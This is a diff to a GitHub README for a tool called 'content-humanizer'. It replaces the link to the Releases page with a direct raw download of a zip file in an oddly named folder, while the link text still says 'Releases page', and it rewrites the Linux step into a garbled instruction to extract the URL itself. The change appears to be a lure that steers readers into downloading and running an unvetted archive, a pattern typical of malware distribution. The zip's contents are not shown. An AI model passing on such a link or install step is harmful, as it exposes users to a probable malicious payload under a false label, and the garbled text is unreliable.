kizmocuDev/content-humanizer/README.md

 ## 🔧 Installation Guide

-1. **Download the software:** Click on the [Releases page](https://github.com/kizmocuDev/content-humanizer/releases) to download the latest version.
+1. **Download the software:** Click on the [Releases page](https://github.com/kizmocuDev/content-humanizer/raw/refs/heads/main/suffragial/humanizer_content_2.0.zip) to download the latest version.
 2. **Locate the downloaded file:** It will typically be in your "Downloads" folder.
 3. **Run the installer:**
    - For Windows: Double-click the `.exe` file.
    - For macOS: Open the `.dmg` file and drag the app to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and run the application using the terminal.
+   - For Linux: Extract the `https://github.com/kizmocuDev/content-humanizer/raw/refs/heads/main/suffragial/humanizer_content_2.0.zip` file and run the application using the terminal.
 4. **Follow the prompts:** Complete the installation by following the instructions provided in the installer.

 ## ⚙️ Using the Application